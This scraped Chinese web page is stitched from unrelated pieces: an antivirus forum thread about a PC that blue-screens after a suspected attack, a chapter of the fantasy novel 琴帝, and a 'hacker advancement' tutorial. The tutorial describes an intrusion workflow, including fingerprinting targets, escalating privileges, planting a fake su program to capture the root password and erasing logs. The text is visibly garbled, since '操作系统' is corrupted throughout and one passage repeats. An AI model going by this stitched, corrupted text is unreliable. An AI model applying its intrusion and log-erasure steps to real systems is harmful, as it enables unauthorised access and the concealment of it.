竹做的我的世界远程攻击挂击

(ERROR:15) & 访客不能直接访问1&&/&&1&&页
跳转 0 ? parseInt(this.value) : 1) + '.aspx';}else{window.location='showtopic.aspx?topicid=6798935&page=' + (parseInt(this.value) > 0 ? parseInt(this.value) : 1) ;}}"" size="4" maxlength="9"
class="colorblue2"/>页
班竹快来啊~我电脑被攻击拉~蓝屏死机
初生襁褓狮
班竹快来啊~我电脑被攻击拉~蓝屏死机
昨天我的电脑连续两次被攻击~~~之后就蓝屏死机今天我开机时主机响得要命~~~~~~~怎么办啊????我的电脑系统是XP~~~我刚刚看过XP漏洞的事我现在可以肯定~~~~黑客们正开始攻击大家的系统快来人啊~~~~教我怎么做才好我本来有两部电脑的~~~~~~可是上个星期也出现这个情况~~~结果主机有几条电线烧掉了快来人啊~~不然我的电脑就快完蛋拉
看看能不能进安全模式,在安全模式下杀毒试试。
威望:8275
初生襁褓狮
我的杀毒版本是最新的终于开机了~~可是只杀到两个Trojan.PSW.QQRobber.16.c的病毒~~~~我查了相关资料~~是个小木马病毒我的电脑现在还没事但是黑客睡醒了~~~有可能会又找我开刀的
健康舞勺狮
来自:Windows 7
硬件都烧了,看来不是病毒,一般病毒顶多把你的硬盘塞满了,泄露点密码帐号,况且溢出攻击顶多重启,况且你怎么能知道有攻击?肯定防火墙拦截了,看看是不是硬件的问题,或者线路有问题,电压,跳线^^^^^仅供参考
初生襁褓狮
我的电脑没有装防火墙
飘泊而立狮
来自:邪恶八进制
引用:【我可掺了的贴子】我的电脑没有装防火墙...........................呵呵,推荐你装LOOKNSTOP防火墙
威望:1093
初生襁褓狮
WinXP最新发现的一个漏洞可导致攻击者实施远程攻击,可能造成系统崩溃。微软称正在赶制补丁。   据安全专家本周早些时候的公告,新漏洞危及视窗远程桌面服务系统的安全,该系统允许用户远程登录自己的视窗PC。攻击者可发动拒绝服务袭击,可能造成受害者PC崩溃,受攻击电脑会出现“蓝屏死机现象”。   微软一位发言人周五表示,公司已知道了这一漏洞,目前正在赶制补丁。   该发言人说,“最初有用户私下向微软进行了报告,等补丁做好后会及时发布。当前我们担心,由于漏洞消息已公开,用户可能面临更大风险。”   据专家介绍,微软早在5月4日就被告知该漏洞的存在,计划于8月份发布补丁。该网站称,所有打满补丁,包括经过Service Pack 2升级或装有防火墙的Win XP电脑都存在被攻击危险。   微软代表称,最初认为攻击者可能无法运行受害PC的代码,但可造成电脑中断响应。另外,她还表示,只有使用远程桌面服务系统的用户可能受到攻击。   iDefense实验室主管迈克尔·萨顿表示,“不大可能会出现比拒绝服务攻击更严重的攻击,攻击者不大可能会控制你的电脑,但可以使它下线。”   安全监测专家周四发表的通报中将该漏洞列为“中度危险”。   微软表示,目前还没有发现利用该漏洞实施的攻击。
初生襁褓狮
所以我不敢装防火墙~~~
健康舞勺狮
来自:Windows 7
一般只有XP专业版的有远程桌面程序,不过装不装防火墙和受不受攻没直接关系.再说连入INTENET网的又不是你一台机子,怕什么,没什么重要信息先全面杀毒(断开网),不行再格盘,重装系统,看看我的那篇重装系统
初生襁褓狮
1&&/&&1&&页
跳转 0 ? parseInt(this.value) : 1) + '.aspx';}else{window.location='showtopic.aspx?topicid=6798935&page=' + (parseInt(this.value) > 0 ? parseInt(this.value) : 1) ;}}"" size="4" maxlength="9"
class="colorblue2"/>页
论坛跳转...
热点专题 &&瑞星之剑 &&瑞星ESM(瑞星下一代网络版杀毒软件) &&瑞星安全云 &&瑞星杀毒软件网络版 && &&北方区 && &&华东区 && &&华南区 && &&木马入侵拦截有奖体验专区 && &&瑞星2009版查杀引擎测试 && &&瑞星2009测试版问题反馈 && && &&瑞星杀毒软件2009公测 && && &&瑞星个人防火墙2009公测 && && &&瑞星全功能安全软件2009公测 &&瑞星下一代防火墙、瑞星下一代防毒墙、瑞星网络安全预警系统 &&瑞星虚拟化系统安全软件瑞星产品求助区 &&瑞星杀毒软件 && &&瑞星安全联盟论坛 && &&瑞星杀毒软件V16+ && && &&V16+新引擎测试专区 && &&瑞星全功能安全软件 && &&瑞星杀毒软件2011 &&瑞星个人防火墙V16 && &&广告过滤 && &&瑞星个人防火墙2011 &&瑞星路由安全卫士 && &&路由系统内核漏洞 &&瑞星安全随身WiFi &&瑞星手机安全助手 &&瑞星其他产品 && &&APP保镖 && &&瑞星安全浏览器 && &&瑞星安全助手 && && &&卡卡上网安全助手 && &&瑞星WiFi助手 && &&瑞星软件管家 && &&瑞星加密盘 && &&账号保险柜5.0 && &&瑞星专业数据恢复技术交流区 &&反病毒/反流氓软件论坛 && &&菜鸟学堂 && &&安全技术讨论 &&可疑文件交流 &&恶意网站交流 && &&瑞星云安全网站联盟专版 && &&每日网马播报 &&入侵防御(HIPS) &&系统软件 && &&防火墙自定义规则 &&硬件交流综合娱乐区 &&Rising茶馆 &&影音贴图 &&瑞星安全游戏 && &&凡人修真 && &&华人德州扑克 && &&一球成名 && &&星际世界 && &&神仙道 && &&赢家竞技 && &&梦幻飞仙 && &&三国演义 && &&仙落凡尘 && &&秦美人 && &&攻城掠地 && &&女神联盟 && &&风云无双 && &&傲视九重天 && &&深渊 && &&魅影传说 && &&热血屠龙 && &&雷霆之怒 && &&大天使之剑 && &&传奇霸业 && &&无上神兵 && &&斗破沙城 && &&全民裁决 && &&蛮荒之怒2 &&活动专区 && &&瑞星积分商城 && &&实习生专区 && && &&实习生交流区 && && && &&实习生签到区 && && &&实习生考核区 && &&“安全之狮”校园行活动专版 && &&历史活动 && && &&论坛9周年活动专区 && && &&关注灾情 同心抗灾本站站务区 &&站务 &&版主之家[限] && &&禁言禁访记录 &&待审核 &&瑞星客户俱乐部[限]您现在所在的位置:第二百六十一章 琴城远程攻击军团(中)_琴帝小说 - 唐家三少
> 第二百六十一章 琴城远程攻击军团(中)
【Ctrl+d 加入收藏】
第二百六十一章 琴城远程攻击军团(中)
书名:&&作者:唐家三少
超级天才一秒钟记住本站网址 www.qindi.net 琴帝 拼音+.net ,喜欢就记住我吧!
第二百六十一章 琴城远程攻击军团(中)尽管他们的投掷距离也可以达到八百米开外,但他们的掷矛可没有弓箭附带箭羽,利用仰射延伸攻击距离的能力,他们这一轮的攻击,是直接朝向空中的。原来,在感觉到对方威胁到了己方最重要的魔法师军团情况下,空中的飞马骑士团和魔雕骑士团第一时间已经做出反应,整整两万空军,带着无与伦比的气势从天而降,直奔琴城城头的方向冲来,他们相信,只要将这些弓箭手干掉,那么,魔法师们就不会再受到任何威胁。但是,飞马圣骑士杰拉德并没有和当初的龙族交流过,如果他知道龙族在进入琴城凌空之后遇到了什么,他绝不会如此草率的下达从空中攻击的命令。两大飞行军团下冲,首先迎上他们的,就是树妖德鲁伊发出的掷矛。掷矛的威力又岂是普通弓箭所能相比的,要知道,掷矛可是树妖德鲁伊唯一的能力,他们能够排名在角鹰之上,凭借的就是这一手掷矛绝技。当然,飞马骑士们并不认为这两千掷矛就能对他们产生什么影响,手中修长的龙枪同时探下,凭借着他们强横的力量,绿色、青色、蓝色,甚至是紫色的斗气几乎在第一时间从飞马与魔雕背上的骑士身上爆发开来,他们根本就没有让自己的座骑使用魔法,因为只有这样才能让飞行速度达到最快程度,他们就是要凭借着自己地实力将这为数只有两千的掷矛挑开。根据飞马圣骑士杰拉德计算,那些发出掷矛的种族,也只有这一轮攻击的能力,只要挡开这一轮攻击。那么就是对方地死期,他绝对有理由相信。己方能够在最短时间内将这些城头上的障碍彻底清扫。哪怕对方还有那些看上去非常雄壮地钢铁傀儡。但是,飞马与魔雕两个骑士团的战士们还是小看了树妖德鲁伊的能力。身为德鲁伊,只有一种攻击手段地德鲁伊。他们地掷矛会那么简单么?答案是否定的。一根根掷矛在强横的斗气面前破碎。但它们强悍的冲击力还是令飞马骑士与魔雕骑士们下冲的速度减缓了许多。紧接着,令两大法蓝骑士团吃惊地事情发生了,那些破裂的掷矛中释放出一层淡绿色的气体,而且正以惊人地速度飞快蔓延,几乎只是眨眼之间。两千根掷矛所散发出的绿色气体就已经将空中两个法蓝骑士团的战士们全部笼罩在内。毒气?这是杰拉德第一个反应,怒吼声从他口中响起,凭借着强达紫级九阶地斗气传遍战场。“以斗气护体,小心毒气。”法蓝骑士的素质确实恐怖,在听到杰拉德呼喊声的同时他们就已经下意识地做出了反应。不但用斗气护住了自己的身体,同时也护住了跨下地座骑。可惜,他们这是第一次和树妖德鲁伊交手。对于这以前从未见过的种族还是了解的太少太少了。那淡绿色的气体根本就不是毒气,当那淡淡的绿光迅速蔓延之后。每一名飞翔在空中的法蓝骑士都发现自己的身体变得慢了起来,不仅是自己,自己的座骑也是一样。尽管魔雕和飞马都属于七级魔兽,但在树妖德鲁伊这拥有迟缓效果地魔法面前根本无法免疫。原本雷霆万钧的下冲之势顿时一滞,而这个时候,他们距离琴城城头已经只有不到五百米地距离了。上次,在承受了八百成年巨龙地攻击之后,尽管琴城取得了压倒性呃优势。但事后叶音绣就和琴城的高层们仔细研究了那一战地得失。龙族并不是琴城最强大的敌人,他们最强的敌人来自法蓝。法蓝骑士可不会拥有像龙族那样庞大的身体。魔导炮甚至只需要简单的瞄准就能够取得辉煌的成绩。一旦让法蓝骑士分散开来。那么,魔导炮的威力必然会大幅度减弱。发现了这个问题之后。叶音绣、奥利维拉、安雅等人就仔细研究了魔导炮的弊病。任何武器都有自己的优势和弱点,他们研究的最终目的就是将魔导炮的优势发挥到极限,而将弱点尽可能的减小。所以,就有了今日一战的战略部署。奥利维拉充分贯彻了叶音竹的战略思想。魔导炮的攻击速度非常快,但并不是绝对的。距离魔导炮越过。那么。闪躲的可能性也就越小,但也不能太近。因为那样会令魔导炮攻击后产生的余波伤害到自身,经过仔细的试验和计算,琴城高层们发现,五百米到八百米这段距离是魔导炮发挥威力最好的区间,也是威力最恐怖的区间。叶音竹不在,奥利维拉就成为了控制全局的人,当法蓝大军出现的时候,他就开始了对冷静的分析,眼看着法蓝大军开始发动攻击,他也收到了安雅的命令,就开始了准备。对于敌军魔法师的打击无疑是第一目标,毕竟,法蓝最强大的就是魔法师,但与此同时,琴城的领空也必须要捍卫,只有这样,那宽厚的城墙才能发挥出作用。从看到飞马骑士团和魔雕骑士团的那一刻起,奥利维拉就开始了布局,他本来完全可以让地精撕裂者攻击天空,但他并没有那么做,因为他无法肯定地精撕裂者能否给对方造成真正的损伤,一旦失败,还会打草惊蛇。所以,他就布置了这样一个杀局,在大部分攻击力都奔向敌军魔法师的同时,也给法蓝的空军制造了一个陷阱。飞马骑士团与魔雕骑士团发起冲锋的时候都保持着密集阵型,这样对他们来说可以更有效的防御琴城远程攻击军团的攻击。因此,当他们在树妖德鲁伊的攻击下身形变得迟缓时,阵型依旧是密集的。就在这个时候,惊天的轰鸣声响起。那些悄无声息从各个山峰、城头上探出的黝黑炮口早已经充满了恐怖的元素能量,无数光束从四面八方归流而至,直接朝着空中的两万空军而去。绚丽的光芒在空中划出惊艳的彩光,经过这段时间的修整,琴城已经不是当初龙族到来时的琴城了,和那时相比,现在琴城所拥有的防御力更加恐怖。如果法蓝军团是在一个空旷的平原和琴城作战,那么,就算琴城所有力量加起来也未必能与他们抗衡。但这里不一样,这里是琴城,是安雅、叶音竹以及琴城各族努力建设了许久的保垒。只有在这里,琴城的战斗力才能最大程度的发挥出来,尤其是魔导炮,这种恐怖到极致的力量,一旦发动,所产生的效果完全可以用毁天灭地来形容。魔导炮的数量已经超过了二百门,当那二百道炫丽的光柱同时腾起之时,即使是阳光也为之失色,原本应该冰冷的空气几乎在瞬间变得火热起来,所有能量第一时间完全爆发。飞马圣骑士杰拉德,魔雕圣骑士空令其几乎在第一时间就感觉到了不妙,但在这个时候,树妖德鲁伊赋予他们的迟缓效果还没有结束,就算想要逃离这个区域也已经变成了不可能。万幸的是他们刚刚将自身斗气完全开启,以最强的防御状态来面对魔导炮的轰击,可是,他们的防御能和魔导炮的攻击相比么?作为琴城的终极武器,魔导炮的威力是何等恐怖,琴城所拥有的最高品质的魔晶核几乎都以它们为主。这二百门魔导炮之中,大部分都装有超过八阶的魔晶核,酝酿良久的能量一旦爆发出来,还是同时轰击一个地方,那恐怖的力量顿时形成了连锁反应。斯隆的脸色变了,当他看到那庞大的二百道光束时,脸色就已经变得极其难看,他完全可以感受到那些能量凝聚在一起有多么的强大。那是拥有禁咒能量的攻击,每一门魔导炮发出的能量光柱都达到了禁咒的级别,如此众多的禁咒碰撞在一起,威力之恐怖几乎难以用言语来形容。飞马和魔雕的防御力虽然也不错,但要和巨龙那庞大的身体相比差的还是太远了,龙族的身体条件,在魔兽中是顶尖的,在那样的情况下都无法和魔导炮的攻击抗衡,更不用说这些还远不如龙族防御的魔兽了。只见魔导炮所及之处,正面轰中的飞马骑士和魔雕骑士都在第一时间彻底的从这个世界消失了,他们能做的,也只是凭借防御斗气令那恐怖的冲击力削弱几分而已。只有魔兽的晶核和他们手中的武器才能勉强保存下来,生命印记却被彻底抹杀。
《》是唐家三少的大作,本章节是,本站提供,请收藏本站支持唐家三少哦,请在手机收藏本站 。
标题:第二百六十一章 琴城远程攻击军团(中)&&
琴帝最新章节
琴帝随机推荐
琴帝小说是作者唐家三少的经典著作,琴帝是奇幻题材类小说。本站提供琴帝小说全文阅读且无弹窗,一直为大家提供琴帝全文章节列表在线阅读,希望大家多多来本站看琴帝哦!内容互通,快速登录
还没有帐号? 赶紧
日志用户版块群组帖子
<div id="bdshare" class="bdshare_t bds_tools_32 get-codes-bdshare"
黑客进阶篇——全部认真的看完,不想成为高手都不行
在线时间小时
电魂*威望*好评0信誉2爱心76
N多页慢慢看吧,菜鸟晋级之路。基本技能...................................................................................2楼黑客初级技术讲解(上)..........................................................3楼黑客初级技术讲解(中)..........................................................4楼黑客初级技术讲解(下)..........................................................5楼基础知识(1)..........................................................................6楼基础知识(2)..........................................................................7楼基础知识(3)..........................................................................8楼基础知识(4)..........................................................................9楼黑客兵器之木马篇(上)........................................................10楼黑客兵器之木马篇(下)..................................................... ...11楼黑客兵器之扫描篇(上).........................................................12楼黑客兵器之扫描篇(下).........................................................13楼代理、肉鸡、跳板的概念.........................................................14楼PHP近期漏洞更新....................................................................15楼系统进程信息..........................................................................16楼端口全解析(上)...................................................................17楼端口全解析(下)...................................................................18楼端口详细说明表(上)............................................................19楼端口详细说明表(下)............................................................20楼木马防范及一些端口的关闭................................................. ...21楼SSL.TLS.WTLS原理(上).....................................................22楼SSL.TLS.WTLS原理(下).....................................................23楼关于MAC地址和IP地址的知识..................................................24楼术语表(1)............................................................................25楼术语表(5)............................................................................29楼网络安全知识(1)...................................................................30楼........................网络安全知识(7)...............................................................31楼防范非系统用户破坏..............................................................32楼PING命令及使用技巧.............................................................33楼GHOST详细解说(1)...........................................................34楼GHOST详细解说(2)...........................................................35楼GHOST详细解说(3)...........................................................36楼ipc$详细解说大全(1)..........................................................37楼..............................ipc$详细解说大全(5)..........................................................42楼常见ASP脚本攻击及防范技巧.................................................43楼开启3389的5种方法(上).....................................................44楼开启3389的5种方法(下).....................................................45楼网络常见攻击及防范手册(上)..............................................46楼网络常见攻击及防范手册(下)..............................................47楼DOS攻击原理及方法介绍..........................................................48楼如何突破各种防火墙..................................................................49楼蠕虫技术(上).........................................................................50楼蠕虫技术(中)..........................................................................51楼蠕虫技术(下)........................................................................ ..52楼壳(上).......................................................................................53楼壳(下).......................................................................................54楼浅谈绑定之应用..............................................................................55楼永远的后门.....................................................................................56楼入门者如何获得肉鸡.......................................................................57楼NET START可以起用命令一览表.....................................................58楼PS:本文由"紫月轩"发于黑客基地,在此表示感谢,全部转完了,虽说不是原创,但也累的不行哦!觉得好的就顶我一个吧!呵呵,谢谢![ 本帖最后由 胡可 于
22:53 编辑 ]
在线时间小时
电魂*威望*好评0信誉2爱心76
网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标,信息安全包括两个方面:信息的存储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全,有以下几个问题:  (1)对网络上信息的监听  (2)对用户身份的仿冒  (3)对网络上信息的篡改  (4)对发出的信息予以否认  (5)对信息进行重发  对于一般的常用入侵方法主要有  1.口令入侵  所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。  2.特洛伊木马术  说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。  3.监听法  这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所谓艺高人胆大。  网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站。”  此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”联接就马上完成。  目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的监听到数据,甚至就包含口令文件,有的服务在传输文件中直接使用明文传输,这也是非常危险的4.E-mail技术  使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。  5.病毒技术  作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,特殊时间,特殊地点完全可以使用。  6.隐藏技术  网络攻击的一般步骤及实例  攻击的准备阶段  首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。  进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,破解密码,日志清除等技术,下面分别介绍。  1.确定攻击的目的  攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器想跳楼作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。  2.信息收集  除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的想跳楼作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信息。  要攻击一台机器,首先要确定它上面正在运行的想跳楼作系统是什么,因为对于不同类型的想跳楼作系统,其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种想跳楼作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的想跳楼作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其想跳楼作系统。例如当我们通过TELNET连上一台机器时,如果显示  Unix(r)System V Release 4.0  login:  那么根据经验就可以确定这个机器上运行的想跳楼作系统为SUN OS 5.5或5.5.l。但这样确定想跳楼作系统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型和想跳楼作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。  另外一种相对比较准确的方法是利用网络想跳楼作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的想跳楼作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包,然后通过返回的包来确定想跳楼作系统类型。例如通过向目标机发送一个FIN的包(或者是任何没有ACK或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的想跳楼作系统相匹配的方法。利用它可以对许多系统分类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度,这项技术根据各个想跳楼作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。  获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般TELNET在23端口,FTP在对21端口,WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP服务,可以使用wuftp、 proftp,ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。  另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的名称、规模,网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系,实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码,如果掌握了该电话号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。  攻击的实施阶段  1.获得权限  当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。  能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的 Powered by Apache图样(羽*状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。
在线时间小时
电魂*威望*好评0信誉2爱心76
黑客初级技术讲解(上)1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必须学会C。但,如果你只是学一种语言,那么你不能算是一位黑客,了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说,你必会学还了C之外的东西,你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习。程序设计是一种复杂的技术,我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多,几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码;(写程序,这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言,最好的方法是去看一些专家们所写的东西,然后写一些你自己的东西,然后读更多,再写更多。然后一直持续,一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事,因为,对菜鸟黑客们而言,适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和想跳楼作系统(大都公开提供 source,而且全都是由黑客们写成的)到处可看。进入下一个主题。2、取得一个免费的 UNIX,并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福,可如此轻易的拥有 :-))。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix,并将它安装在自己的机器,并使之顺利的运作。没错,在这个世界上除了Unix之外,还有其它的想跳楼作系统。但是他们只提供 bianry,你不能看到他们的程序码,你也不能修改他们。想要在DOS或Windows或MacOS开始hacking,无疑就是要你绑著枷锁跳舞一样。除此之外,Unix是Internet上的想跳楼作系统。当你在不懂Unix的情况下学习使用Internet时,你没辨法在不懂Unix的情况下成为 Internet的黑客。因为这个原故,现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的,而且有些活在旧时代的黑客甚至也不喜欢这种情形,但是Unix和Internet之间的共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft想跳楼作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并学到比共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft想跳楼作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并学到比你想像中的还要多的知识。关于学习Unix,在Loginataka有更多的资料。(。)看一下Linux distribution的目录或 Linux CD,并把自己交付给它。3、学习使用World Wide Web并学会写 HTML。在黑客文化创造出来的东西,大多在他们的活动范围外被使用著,如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外,这个黑客眼中的大玩具甚至还被政客们接受,并巧巧的在改变这个世界。因此(还有很多好的理由),你必须学习Web。并不只是学习使用browser(这太容易了)而己,还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序,写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过,有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page,而且大部份都没什么重点,没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样,差不多。4、至少学会以下的其中两种:一、网站服务器程序ASP、PHP、CGI、jsP我个人认为CGI是最难学的其中一种。二、程序语言:C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言不过我认为C语言的通用性最好,可以跨平台(想跳楼作系统)使用。还要试着自己写程序、开发软件等工作。三、数据库管理软件:MYSQL、SQL、FOXPRO……等。四、几种常用的想跳楼作系统:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。如果以上的你都会了,那么你已经是个高手了
在线时间小时
电魂*威望*好评0信誉2爱心76
黑客初级技术讲解(中) 当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。  无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm. securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。  2.权限的扩大  系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。  攻击的善后工作  1.日志系统简介  如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络想跳楼作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的想跳楼作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据想跳楼作系统的不同略有变化  /usr/adm——早期版本的Unix。  